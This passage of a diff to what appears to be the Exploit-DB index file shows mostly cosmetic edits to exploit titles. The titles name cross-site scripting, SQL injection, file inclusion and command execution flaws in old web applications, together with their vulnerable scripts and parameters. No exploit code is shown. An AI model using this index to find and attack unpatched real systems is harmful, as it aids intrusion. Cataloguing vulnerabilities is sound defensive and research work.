Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 +23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - 'privmsg.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",php,webapps,0 23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 - desc Parameter Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 23478,platforms/php/webapps/23478.txt,"Psychoblogger PB-beta1 - errormessage Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 -23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 - board.php Cross-Site Scripting",2003-12-27,gr00vy,php,webapps,0 +23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 - 'board.php' Cross-Site Scripting",2003-12-27,gr00vy,php,webapps,0 23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module - SQL Injection",2003-12-27,idtwolf@pisem.net,php,webapps,0 23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - 'index.php' Page Parameter Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps,0 @@ -27289,7 +27290,7 @@ id,file,description,date,author,platform,type,port 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple Remote File Inclusions",2004-01-06,Windak,php,webapps,0 -23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 +23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - 'search.php' Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0 @@ -27310,13 +27311,13 @@ id,file,description,date,author,platform,type,port 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 -23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x - viewtopic.php Cross-Site Scripting",2004-01-26,"Ben Drysdale",php,webapps,0 +23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x - 'viewtopic.php' Cross-Site Scripting",2004-01-26,"Ben Drysdale",php,webapps,0 23607,platforms/php/webapps/23607.txt,"Kietu 2/3 - 'index.php' Remote File Inclusion",2004-01-26,"Himeur Nourredine",php,webapps,0 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 -23616,platforms/php/webapps/23616.txt,"PHPGedView 2.x - Editconfig_gedcom.php Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps,0 +23616,platforms/php/webapps/23616.txt,"PHPGedView 2.x - 'Editconfig_gedcom.php' Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps,0 23617,platforms/php/webapps/23617.txt,"PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0 -23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x - browser.php Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps,0 +23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x - 'browser.php' Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps,0 23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 @@ -27358,14 +27359,14 @@ id,file,description,date,author,platform,type,port 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 -23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php' Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 23718,platforms/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop.php?cat' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23719,platforms/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop_by_brand.php?cat_manufacturer' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23720,platforms/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - 'listing.php?id' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - multiplechoice/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - glossary.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23724,platforms/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 - 'newmultiplechoice.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - 'glossaries/index.php' File Parameter Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - '/glossaries/index.php' File Parameter Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 - readings/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 - resultsignore.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - error.asp Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 @@ -27407,8 +27408,8 @@ id,file,description,date,author,platform,type,port 23819,platforms/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x - 'profile.php?target' Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - 'search.php?search_results' SQL Injection",2004-01-04,pokleyzz,php,webapps,0 -23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - forumdisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 -23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - showthread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - 'forumdisplay.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - 'showthread.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0 @@ -27419,7 +27420,7 @@ id,file,description,date,author,platform,type,port 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0 23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php?language' Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-18,"Janek Vind",php,webapps,0 -23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 +23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - 'resend.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - 'error.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 40401,platforms/php/webapps/40401.txt,"ZineBasic 1.1 - Arbitrary File Disclosure",2016-09-19,bd0rk,php,webapps,80 @@ -27427,11 +27428,11 @@ id,file,description,date,author,platform,type,port 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - 'comment_add.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - 'search.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - 'category_news_headline.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 -23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - 'more.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - 'category_news.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - 'news_sort.asp' filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 +23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - 'more.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 +23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - 'category_news.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 +23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - 'news_sort.asp?filter' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 -23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 +23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - 'private.php' Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injections",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 @@ -27451,7 +27452,7 @@ id,file,description,date,author,platform,type,port 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",asp,webapps,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0 -23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - myhome.php SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0 +23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - 'myhome.php' SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0 23913,platforms/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - index.fts folder Parameter Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps,0 23914,platforms/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 23924,platforms/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",multiple,webapps,0 @@ -27520,7 +27521,7 @@ id,file,description,date,author,platform,type,port 24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - 'query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-15,JeiAr,php,webapps,0 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - 'user.php?bugid' Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 -24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps,0 +24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - '/affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - 'modules.php?offset' SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 @@ -27552,11 +27553,11 @@ id,file,description,date,author,platform,type,port 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 -24088,platforms/php/webapps/24088.txt,"PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24089,platforms/php/webapps/24089.txt,"PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24090,platforms/php/webapps/24090.txt,"PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24091,platforms/php/webapps/24091.txt,"PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24092,platforms/php/webapps/24092.txt,"PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24088,platforms/php/webapps/24088.txt,"PHPX 3.x - '/page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24089,platforms/php/webapps/24089.txt,"PHPX 3.x - '/news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24090,platforms/php/webapps/24090.txt,"PHPX 3.x - '/user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24091,platforms/php/webapps/24091.txt,"PHPX 3.x - '/images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24092,platforms/php/webapps/24092.txt,"PHPX 3.x - '/forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities",2004-05-08,"Janek Vind",php,webapps,0 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 @@ -27574,7 +27575,7 @@ id,file,description,date,author,platform,type,port 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 -24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 - SSI.php SQL Injection",2004-06-11,JvdR,php,webapps,0 +24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 - 'SSI.php' SQL Injection",2004-06-11,JvdR,php,webapps,0 24188,platforms/cgi/webapps/24188.pl,"BlackBoard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager - Cross-Site Request Forgery",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 @@ -27598,7 +27599,7 @@ id,file,description,date,author,platform,type,port 24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter Cross-Site Scripting",2004-06-14,scriptX,cgi,webapps,0 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 -24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - SSI.php Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 +24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24201,platforms/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 @@ -27632,9 +27633,9 @@ id,file,description,date,author,platform,type,port 24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - '/detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 -24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 +24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24279,platforms/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],php,webapps,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 @@ -27670,7 +27671,7 @@ id,file,description,date,author,platform,type,port 24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0 -24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - ControlPanel.php SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0 +24334,platforms/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection",2004-07-29,"Fernando Quintero",php,webapps,0 24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,php,webapps,0 24341,platforms/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",php,webapps,0 24347,platforms/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",cgi,webapps,0 @@ -27686,7 +27687,7 @@ id,file,description,date,author,platform,type,port 24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 -24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 +24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - 'address.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - 'settings.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,php,webapps,0 24379,platforms/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - attachment.html attachmentpage_text_error Parameter Cross-Site Scripting",2004-07-17,Criolabs,php,webapps,0 @@ -27748,7 +27749,7 @@ id,file,description,date,author,platform,type,port 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 -24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - 'install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 +24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - '/install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php?id' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 @@ -27852,7 +27853,7 @@ id,file,description,date,author,platform,type,port 24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0 -24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0 +24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - 'SettingsBase.php' Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0 24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",unix,webapps,0 @@ -27860,7 +27861,7 @@ id,file,description,date,author,platform,type,port 24697,platforms/php/webapps/24697.txt,"S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0 -24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - Wiki.php Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps,0 +24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - 'Wiki.php' Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps,0 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,cgi,webapps,0 24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24889,platforms/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 @@ -27872,7 +27873,7 @@ id,file,description,date,author,platform,type,port 24723,platforms/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",cgi,webapps,0 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple 